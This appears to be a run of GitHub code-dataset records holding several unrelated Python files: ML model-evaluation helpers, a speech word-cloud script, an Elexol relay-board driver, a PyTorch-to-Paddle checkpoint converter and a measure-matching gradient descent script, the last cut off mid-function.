extensions]\n\n def set_exclude_extensions(self, extensions):\n assert isinstance(extensions, (list, tuple))\n self.exclude_extensions = [tmp.lower() for tmp in extensions]\n\n def get_log_processed(self):\n # self.log = {\n # '/path/to/directory': {\n # '.frockup.gdbm': {\n # 'excluded': True,\n # 'excluded_reason': 'file-filter'\n # },\n # 'fome-file.txt': {\n # 'excluded': True,\n # 'excluded_reason': 'local-metadata'\n # },\n # 'some-other-file.txt': {\n # 'excluded': True,\n # 'excluded_reason': 'local-metadata'\n # },\n # }\n # }\n excluded = []\n included = []\n for directory, entries in self.log.iteritems():\n for filename, stat_dict in entries.iteritems():\n if stat_dict.get('included', False):\n included.append([directory, filename])\n elif stat_dict.get('excluded', False):\n excluded.append([directory, filename])\n return included, excluded\n\n\ndef get_config(filename=None):\n \"\"\"Loads configuration and returns instance of ConfigParser\"\"\"\n config_file = os.path.expanduser(filename or '~/.frockup/frockup.conf')\n logging.debug(\"Loading config from %s\", config_file)\n assert os.path.exists(config_file), \\\n \"The configuration file {0} does not exists\".format(config_file)\n assert os.path.isfile(config_file), \\\n \"The configuration {0} is not a regular file\".format(config_file)\n config = ConfigParser.ConfigParser()\n config.read(config_file)\n return config\n", "repo_name": "hgdeoro/frockup", "sub_path": "frockup/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 3324, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.expanduser", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": 
"os.path.isfile", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "ConfigParser.ConfigParser", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "33822299574", "text": "import pandas as pd\nimport numpy as np\nfrom joblib import dump, load\nfrom sklearn import metrics\nimport time\n\n\ndef model_save (model, model_name):\n file_name = model_name+'.joblib'\n dump(model, file_name)\n \ndef model_load (model_name):\n file_name = model_name+'.joblib'\n\n return load(file_name)\n\n\ndef plot_confidence_interval_for_data (model, X):\n \"\"\"\n Pass 10 - 15 datapoints for better visualization. \n This function plots the confidence interval of predictive value for the provided datapoints\n\n Parameters:\n -----------\n model : model that is built\n X : datapoints for evaluation\n\n Returns:\n --------\n Plot\n\n \"\"\"\n preds = np.stack([t.predict(X) for t in model.estimators_], axis=1)\n preds_ds = pd.DataFrame()\n preds_ds['mean'] = preds.mean(axis=1)\n preds_ds['std'] = preds.std(axis=1)\n\n fig = plt.figure(figsize=(15,6))\n my_xticks = ['datapoint ' + str(i+1) for i in list(preds_ds.index)]\n plt.errorbar(x = preds_ds.index, y=preds_ds['mean'], yerr=preds_ds['std'], \n fmt='o', color='blue', ecolor='lightblue', capsize=3)\n plt.title('Confidence Interval for the predicted value')\n plt.xticks(preds_ds.index, my_xticks)\n for i in list(preds_ds.index):\n m, std = round(preds_ds['mean'][i],1), round(preds_ds['std'][i],2)\n s=f' pred={m} \\n std dev= {std}'\n plt.text(x = i, y=preds_ds['mean'][i], s=s ) \n plt.show()\n\n\ndef plot_confidence_interval_for_variable (model, X, y, variable):\n \"\"\"\n This function plots the confidence interval of predictive value for the provided variable\n\n Parameters:\n -----------\n model : model that is built\n X : datapoints \n y : actual value\n variable : variable for evaluation\n\n Returns:\n --------\n Plot\n\n \"\"\"\n\n preds = np.stack([t.predict(X) for t in model.estimators_], axis=1)\n X_ds_new = X.copy()\n X_ds_new['actual'] = y\n X_ds_new['pred'] = np.mean(preds, axis=1)\n X_ds_new['pred_std'] = np.std(preds, axis=1)\n\n X_ds_grp = X_ds_new.groupby(variable)['actual', 'pred', 'pred_std'].agg('mean')\n X_ds_grp['count'] = X_ds_new[variable].value_counts()\n\n print (f'Average Predicted value and Std Dev by : {variable}')\n display(X_ds_grp)\n print ('')\n print (f'Distribution of Predicted value by : {variable}')\n sns.catplot(x=variable, y='pred', data=X_ds_new, kind='box')\n plt.show()\n\n\ndef threshold_evaluation(y_true, y_prob, start=0, end=1, step_size=0.1):\n \"\"\"\n This function produces various model evaluation metrics at various values of threshold. \n The values of threshold are customizable using parameters 'start', 'end', 'nsteps'\n\n Parameters:\n -----------\n y_true : 'array', actual value of y (this could be y_train, y_valid, or y_test)\n y_prob : 'array', predicted value of y (this could be from train, valid or test)\n start : 'int', default = 0. starting point for threshold values\n end : 'int', default = 1. 
End point for threshold values\n step_size : 'float', default = 0.1 | Step size for incrementing the threshold values\n\n Returns:\n --------\n df : 'dataframe', dataframe with various model evaluation metrics \n \"\"\"\n threshold_list = np.arange(start,end,step_size)\n result = []\n \n for t in threshold_list:\n y_pred = (y_prob>=t).astype(int)\n tn = metrics.confusion_matrix(y_true, y_pred)[0][0]\n fp = metrics.confusion_matrix(y_true, y_pred)[0][1]\n fn = metrics.confusion_matrix(y_true, y_pred)[1][0]\n tp = metrics.confusion_matrix(y_true, y_pred)[1][1]\n\n accuracy_scr = metrics.accuracy_score(y_true, y_pred)\n precision_scr = metrics.precision_score(y_true, y_pred)\n recall_scr = metrics.recall_score(y_true, y_pred)\n f1_scr = metrics.f1_score(y_true, y_pred)\n roc_auc_scr = metrics.roc_auc_score(y_true, y_pred)\n\n result.append((t, tp, fp, tn, fn, accuracy_scr, precision_scr, recall_scr, f1_scr, roc_auc_scr))\n \n result_df = pd.DataFrame(result)\n result_df.columns = ['Threshold','TP', 'FP', 'TN', 'FN' , 'Accuracy Score', 'Precision Score', \n 'Recall Score', 'F1 Score', 'ROC AUC Score']\n return result_df\n\ndef metrics_evaluation(y_true, y_prob, threshold, df_type='train'):\n \"\"\"\n This function produces various model evaluation metrics at various values of threshold. \n The values of threshold are customizable using parameters 'start', 'end', 'nsteps'\n\n Parameters:\n -----------\n y_true : 'array', actual value of y (this could be y_train, y_valid, or y_test)\n y_prob : 'array', predicted value of y (this could be from train, valid or test)\n threshold : 'float', threshold value at which predicted probability needs to be converted to predictions\n df_type : 'str', Usual values are 'train', 'valid, 'test'\n\n Returns:\n --------\n result : 'list', list with various model evaluation metrics \n \"\"\"\n\n y_pred = (y_prob>=threshold).astype(int)\n \n tn = metrics.confusion_matrix(y_true, y_pred)[0][0]\n fp = metrics.confusion_matrix(y_true, y_pred)[0][1]\n fn = metrics.confusion_matrix(y_true, y_pred)[1][0]\n tp = metrics.confusion_matrix(y_true, y_pred)[1][1]\n\n accuracy_scr = metrics.accuracy_score(y_true, y_pred)\n precision_scr = metrics.precision_score(y_true, y_pred)\n recall_scr = metrics.recall_score(y_true, y_pred)\n f1_scr = metrics.f1_score(y_true, y_pred)\n roc_auc_scr = metrics.roc_auc_score(y_true, y_pred)\n\n result = {'Dataset': df_type, 'No obs': len(y_true), 'Threshold': threshold,\n 'TP':tp, 'FP': fp, 'TN': tn, 'FN':fn , \n 'Accuracy Score':accuracy_scr, 'Precision Score':precision_scr, \n 'Recall Score':recall_scr, 'F1 Score':f1_scr, 'ROC AUC Score':roc_auc_scr}\n\n return result\n\ndef execute_model(model, model_name, X_train, y_train, X_valid, y_valid, X_test, y_test, eval_metrics='ROC AUC Score'):\n model_results = []\n start = time.perf_counter()\n #Training\n model.fit(X_train, y_train)\n \n #Predict\n y_train_prob = model.predict_proba(X_train)[:,1]\n y_valid_prob = model.predict_proba(X_valid)[:,1]\n y_test_prob = model.predict_proba(X_test)[:,1]\n \n #Calculate threshold\n valid_result_df = threshold_evaluation(y_true=y_valid, y_prob=y_valid_prob, start=0, end=1, step_size=.05)\n id_max = valid_result_df[eval_metrics].idxmax()\n threshold = valid_result_df.loc[id_max, 'Threshold']\n\n end = time.perf_counter()\n run_time= round(end-start, 2)\n\n train_res = metrics_evaluation(y_true=y_train, y_prob=y_train_prob, threshold=threshold, df_type='train')\n train_res['Algorithm'] = model_name\n train_res['Run Time'] = run_time\n 
model_results.append(train_res)\n\n valid_res = metrics_evaluation(y_true=y_valid, y_prob=y_valid_prob, threshold=threshold, df_type='valid')\n valid_res['Algorithm'] = model_name\n valid_res['Run Time'] = run_time\n model_results.append(valid_res)\n\n test_res= metrics_evaluation(y_true=y_test, y_prob=y_test_prob, threshold=threshold, df_type='test')\n test_res['Algorithm'] = model_name\n test_res['Run Time'] = run_time\n model_results.append(test_res)\n\n #print(model_results)\n model_results_df = pd.DataFrame(model_results)\n model_results_df = model_results_df[['Algorithm', 'Run Time', 'Dataset', 'No obs', 'Threshold',\n 'TP', 'FP', 'TN', 'FN' , 'Accuracy Score', 'Precision Score', \n 'Recall Score', 'F1 Score', 'ROC AUC Score']]\n return model_results_df\n", "repo_name": "samarth-agrawal-86/fast_ml", "sub_path": "fast_ml/model_evaluation.py", "file_name": "model_evaluation.py", "file_ext": "py", "file_size_in_byte": 7650, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 20, "dataset": "github-code", "pt": "61", "api": [{"api_name": "joblib.dump", "line_number": 10, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 102, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 107, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 107, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 108, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 108, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 109, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 109, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 110, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 110, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 112, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 112, "usage_type": "name"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 113, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 113, "usage_type": "name"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 114, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 114, "usage_type": "name"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 115, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 115, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 116, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 116, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 120, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 144, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 144, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 145, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 145, "usage_type": "name"}, {"api_name": 
"sklearn.metrics.confusion_matrix", "line_number": 146, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 146, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 147, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 147, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 149, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 149, "usage_type": "name"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 150, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 150, "usage_type": "name"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 151, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 151, "usage_type": "name"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 152, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 152, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 153, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 153, "usage_type": "name"}, {"api_name": "time.perf_counter", "line_number": 164, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 178, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 197, "usage_type": "call"}]} +{"seq_id": "17232959418", "text": "import pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport numpy as np\nfrom wordcloud import WordCloud\n\n# Charger les données\ndata = pd.read_excel(\"Discours.xlsm\")\n\n# Extraire les mots et leur fréquence pour Obama\nwords_obama = data[\"wordsObama\"]\nfrequency_obama = data[\"Obama\"]\n\n# Créer un graphique en barres des mots les plus fréquents pour Obama\nplt.bar(words_obama[:10], frequency_obama[:10])\nplt.xlabel(\"Mots\")\nplt.ylabel(\"Fréquence\")\nplt.title(\"Mots les plus fréquents - Obama\")\nplt.xticks(rotation=45)\nplt.show()\n\n\n# Extraire les mots et leur fréquence pour Trump\nwords_trump = data[\"wordsTrump\"]\nfrequency_trump = data[\"Trump\"]\n\n# Créer un graphique en barres des mots les plus fréquents pour Trump\nplt.bar(words_trump[:10], frequency_trump[:10])\nplt.xlabel(\"Mots\")\nplt.ylabel(\"Fréquence\")\nplt.title(\"Mots les plus fréquents - Trump\")\nplt.xticks(rotation=45)\nplt.show()\n\n\n# Filtrer les données pour exclure les valeurs booléennes\nfiltered_words_obama = words_obama[data[\"Obama\"].astype(bool)]\n\n# Concaténer les mots filtrés en une seule chaîne de caractères\ntext_obama = ' '.join([word for word in filtered_words_obama])\n\n# Créer un nuage de mots pour Obama\nwordcloud_obama = WordCloud(width=800, height=400).generate(text_obama)\n\n# Afficher le nuage de mots pour Obama\nplt.figure(figsize=(10, 5))\nplt.imshow(wordcloud_obama, interpolation='bilinear')\nplt.axis('off')\nplt.title(\"Nuage de mots - Obama\")\nplt.show()\n\n\n# Supprimer les lignes avec des valeurs manquantes dans les colonnes \"wordsObama\" et \"Obama\"\ndata_cleaned = data.dropna(subset=[\"wordsTrump\", \"Trump\"])\n\n# Concaténer les mots et leur fréquence pour Obama en une seule chaîne de caractères\ntext_trump = ' '.join([word for word in data_cleaned[\"wordsTrump\"]])\n\n# Créer un nuage de mots pour Obama\nwordcloud_trump = WordCloud(width=800, height=400).generate(text_trump)\n\n# Afficher le nuage de mots pour Obama\nplt.figure(figsize=(10, 5))\nplt.imshow(wordcloud_trump, 
interpolation='bilinear')\nplt.axis('off')\nplt.title(\"Nuage de mots - Trump\")\nplt.show()", "repo_name": "ktiass/sudoku", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 2102, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_excel", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "wordcloud.WordCloud", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "wordcloud.WordCloud", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, 
"usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "12024312347", "text": "import serial\nimport sys\n\nsys.path.append(\"..\\modules\")\nimport elexol\n\n\nclass elexol_board(object):\n def __init__(self,port=1):\n #******************************************************\n #****** set up elexol serial port *********************\n self.USB_ser = serial.Serial(timeout = 3, writeTimeout = 3)\n self.USB_ser.port = int(port)-1\n self.USB_ser.open()\n #******************************************************\n\n\n #******************************************************\n #***** create and initialize the serial port device ***\n self.relays = elexol.Elexol(self.USB_ser)\n self.relays.configure_output_ports('A','B','C')\n self.relays.write_byte_to_portA(0)\n self.relays.write_byte_to_portB(0)\n self.relays.write_byte_to_portC(0)\n #******************************************************\n\n def all_NC(self):\n \"\"\"switch all relays to normally closed state)\n \"\"\"\n self.port_NC(port='A')\n self.port_NC(port='B')\n self.port_NC(port='C')\n\n def all_NO(self):\n \"\"\"switch all relays to normally open state)\n \"\"\"\n self.port_NO(port='A')\n self.port_NO(port='B')\n self.port_NO(port='C')\n\n def port_NC(self,port='A'):\n \"\"\"switch all relays on the given port to normally closed state)\n \"\"\"\n if port in ['a','A']:\n self.relays.write_byte_to_portA(0)\n if port in ['b','B']:\n self.relays.write_byte_to_portB(0)\n if port in ['c','C']:\n self.relays.write_byte_to_portC(0)\n\n def port_NO(self,port='A'):\n \"\"\"switch all relays on the given port to normally open state)\n \"\"\"\n if port in ['a','A']:\n self.relays.write_byte_to_portA(0xFF)\n if port in ['b','B']:\n self.relays.write_byte_to_portB(0xFF)\n if port in ['c','C']:\n self.relays.write_byte_to_portC(0xFF)\n\n def close_serial_port(self):\n self.USB_ser.close()\n\n\nclass relay(object):\n def __init__(self,board,port='A',relay_num=1):\n \"\"\"find the desired relay from the port number(A,B,or C) and relay number(1-8)\n \"\"\"\n self.elexol_DIO = board\n\n if port not in['a','A','b','B','c','C']:\n raise RuntimeError(\"invalid port number given (A-C only)\")\n elif relay_num not in range(1,9):\n raise RuntimeError(\"invalid relay number given (0-23 only)\")\n\n self.relay_id = self.find_relay_id(port,relay_num)\n\n def find_relay_id(self,port, relay_num):\n \"\"\"get the I/O pin number (0-23) for the desired relay\n \"\"\"\n if port in ['a','A']:\n return relay_num - 1\n\n elif port in ['b','B']:\n return relay_num + 7\n\n elif port in ['c','C']:\n return relay_num + 15\n\n def select_NC(self):\n \"\"\"select the normally closed relay position\n \"\"\"\n self.elexol_DIO.relays.clear_bit(self.relay_id)\n\n def select_NO(self):\n \"\"\"select the normally open relay position\n \"\"\"\n self.elexol_DIO.relays.set_bit(self.relay_id)\n\nclass ecg_mux(object):\n def __init__(self,board,port='A'):\n \"\"\"\n \"\"\"\n self.elexol_DIO = board\n\n if port not in['a','A','b','B','c','C']:\n raise RuntimeError(\"invalid port number given (A-C only)\")\n else:\n self.port = port\n\n #define all 
of the relays\n        self.DAC_0_SA = relay(self.elexol_DIO,self.port,8)\n        self.DAC_1_SA = relay(self.elexol_DIO,self.port,7)\n        self.DAC_0_SB = relay(self.elexol_DIO,self.port,6)\n        self.DAC_1_SB = relay(self.elexol_DIO,self.port,5)\n        self.DAC_0_HVA = relay(self.elexol_DIO,self.port,4)\n        self.DAC_1_HVA = relay(self.elexol_DIO,self.port,3)\n        self.DAC_0_HVB = relay(self.elexol_DIO,self.port,2)\n        self.DAC_1_HVB = relay(self.elexol_DIO,self.port,1)\n\n    def SB_SA(self):\n        \"\"\"connect the NI analog output DAC0OUT to SENSEB, DAC1OUT to SENSEA\n        \"\"\"\n        self.elexol_DIO.port_NC(self.port)\n        self.DAC_0_SB.select_NO()\n        self.DAC_1_SA.select_NO()\n\n    def SA_SB(self):\n        \"\"\"connect the NI analog output DAC0OUT to SENSEA, DAC1OUT to SENSEB\n        \"\"\"\n        self.elexol_DIO.port_NC(self.port)\n        self.DAC_0_SA.select_NO()\n        self.DAC_1_SB.select_NO()\n\n    def HVB_SA(self):\n        \"\"\"connect the NI analog output DAC0OUT to HVB, DAC1OUT to SENSEA\n        \"\"\"\n        self.elexol_DIO.port_NC(self.port)\n        self.DAC_0_HVB.select_NO()\n        self.DAC_1_SA.select_NO()\n\n    def SA_HVB(self):\n        \"\"\"connect the NI analog output DAC0OUT to SENSEA, DAC1OUT to HVB\n        \"\"\"\n        self.elexol_DIO.port_NC(self.port)\n        self.DAC_0_SA.select_NO()\n        self.DAC_1_HVB.select_NO()\n\n    def HVB_SB(self):\n        \"\"\"connect the NI analog output DAC0OUT to HVB, DAC1OUT to SENSEB\n        \"\"\"\n        self.elexol_DIO.port_NC(self.port)\n        self.DAC_0_HVB.select_NO()\n        self.DAC_1_SB.select_NO()\n\n    def SB_HVB(self):\n        \"\"\"connect the NI analog output DAC0OUT to SENSEB, DAC1OUT to HVB\n        \"\"\"\n        self.elexol_DIO.port_NC(self.port)\n        self.DAC_0_SB.select_NO()\n        self.DAC_1_HVB.select_NO()\n\n    def D0_to_HVB_and_SB_common_mode(self):\n        \"\"\"connect both HVB and SB to DAC0OUT in common mode configuration\n        \"\"\"\n        self.elexol_DIO.port_NC(self.port)\n        self.DAC_0_HVB.select_NO()\n        self.DAC_0_SB.select_NO()\n\n    def D1_to_HVB_and_SB_common_mode(self):\n        \"\"\"connect both HVB and SB to DAC1OUT in common mode configuration\n        \"\"\"\n        self.elexol_DIO.port_NC(self.port)\n        self.DAC_1_HVB.select_NO()\n        self.DAC_1_SB.select_NO()\n\n    def all_open(self):\n        \"\"\"open all relays in the mux\n        \"\"\"\n        self.elexol_DIO.port_NC(self.port)\n\n\n\n\n", "repo_name": "tawender/Python_Programs", "sub_path": "modules/elexol_relays.py", "file_name": "elexol_relays.py", "file_ext": "py", "file_size_in_byte": 5860, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.append", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "serial.Serial", "line_number": 12, "usage_type": "call"}, {"api_name": "elexol.Elexol", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "41733339410", "text": "from subprocess import check_output\nimport numpy as np\nimport torch\nimport paddle\n\ndef torch2paddle():\n    torch_path = './data/test_diff/checkpoint.pth.tar'\n    paddle_path = \"./data/test_diff/checkpoint_paddle.pdparams\"\n    checkpoint = torch.load(torch_path)\n    backbone = checkpoint['backbone']\n    classifier = checkpoint['classifier']\n    fc_names = [\"fc\", \"W\"]\n    checkpoint_paddle = {}\n    backbone_paddle = {}\n    classifier_paddle = {}\n    for k in backbone:\n        if \"num_batches_tracked\" in k:\n            continue\n        v = backbone[k].detach().cpu().numpy()\n        flag = [i in k for i in fc_names]\n        if any(flag) and \"weight\" in k: # ignore bias\n            new_shape = [1, 0] + list(range(2, v.ndim))\n            print(f\"name: {k}, ori shape: {v.shape}, new shape: {v.transpose(new_shape).shape}\")\n            v = 
v.transpose(new_shape)\n        k = k.replace(\"running_var\", \"_variance\")\n        k = k.replace(\"running_mean\", \"_mean\")\n        backbone_paddle[k] = v\n    for k in classifier:\n        if \"num_batches_tracked\" in k:\n            continue\n        v = classifier[k].detach().cpu().numpy()\n        classifier_paddle[k] = v\n    checkpoint_paddle['backbone'] = backbone_paddle\n    checkpoint_paddle['classifier'] = classifier_paddle\n    checkpoint_paddle['epoch'] = checkpoint['epoch']\n    for k in checkpoint_paddle['backbone']:\n        print(k)\n    for k in checkpoint_paddle['classifier']:\n        print(k)\n\n    paddle.save(checkpoint_paddle, paddle_path)\n\nif __name__ == \"__main__\":\n    torch2paddle()\n    \"\"\"checkpoint = torch.load(\"./data/test_diff/checkpoint.pth.tar\")\n    for i in checkpoint['backbone']:\n        print(i)\n    for i in checkpoint['classifier']:\n        print(i)\"\"\"", "repo_name": "oliverck/Augmented-Geometric-Distillation-PaddlePaddle", "sub_path": "torch2paddle.py", "file_name": "torch2paddle.py", "file_ext": "py", "file_size_in_byte": 1724, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.load", "line_number": 9, "usage_type": "call"}, {"api_name": "paddle.save", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "483453836", "text": "import math as m\nimport re\n\nimport click\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.io import loadmat\nimport torch\n\n\nclass Mesure:\n\n    def __init__(self, point, poid):\n        self.point = point \n        self.poid = poid\n\ndef ker_mat_torch(x, sigma):\n    return(torch.exp(-x/(sigma**2)))\n\ndef fv_exp(x, y, sigma):\n    return(torch.exp(-torch.norm(((x-y)/sigma))**2)) # Compute the norm in the Hilbert space using RKHS\n\ndef test_j1_torch(alpha, mu, sigmaV):\n    return(torch.sum(torch.mul(torch.mm(alpha, torch.t(alpha)), ker_mat_torch(\\\n    torch.sum((torch.transpose(mu.point[np.newaxis, :, :], 1, 0)-mu.point)**2, dim = 2), sigmaV))))\n\ndef test_j2_torch(alpha, mu, nu, p, sigmaI):\n    A = torch.sum(torch.mul(torch.mm(mu.poid[:, np.newaxis], torch.t(mu.poid[:, \\\n    np.newaxis])), ker_mat_torch(torch.sum((torch.transpose(p[np.newaxis, :, \\\n    :], 1, 0)- p)**2, dim = 2), sigmaI)))\n    \n    B = torch.sum(torch.mul(-2 * torch.mm(mu.poid[:, np.newaxis], torch.t(nu.poid\\\n    [:, np.newaxis])), ker_mat_torch(torch.sum((torch.transpose(p[np.newaxis,\\\n    :, :], 1, 0) - nu.point)**2, dim = 2), sigmaI)))\n\n    C = torch.sum(torch.mul(torch.mm(nu.poid[:, np.newaxis], torch.t(nu.poid[:, \\\n    np.newaxis])), ker_mat_torch(torch.sum((torch.transpose(nu.point[np.newaxis\\\n    , :, :], 1, 0) - nu.point)**2, dim = 2), sigmaI)))\n    return(A + B + C)\n\ndef grad_descent2(mu, nu, delta, n, sigmaI, sigmaV, sigmaR, alpha):\n    r = 0\n    while r <= n: \n        test_j1_torch(alpha, mu, sigmaV).backward()\n        gradient_1 = alpha.grad.clone() # clone before the next backward() accumulates into alpha.grad\n        alpha.grad.zero_()\n        p = mu.point + construction_v(mu, alpha, sigmaV)\n        test_j2_torch(alpha, mu, nu, p, sigmaI).backward()\n        gradient_2 = alpha.grad.clone()\n        alpha.data = alpha.data - delta*(gradient_1 + (1/sigmaR**2)*gradient_2)\n        alpha.grad.zero_()\n        r += 1\n    return(alpha)\n\ndef construction_v(mu, alpha1, sigmaV):\n    v_opt = torch.mm(torch.t(ker_mat_torch(torch.sum((torch.transpose(mu.point[np.newaxis, :, :], 1, 0)\\\n    -mu.point)**2, dim = 2), sigmaV)), alpha1)\n    return(v_opt)\n\ndef import_matrices(origin_name):\n    # Import check for filename extension\n    if not re.search(r'.*?\\.mat$', origin_name):\n        raise Exception('Wrong extension name {}, should be .mat'.format(origin_name))\n        return()\n    else:\n        
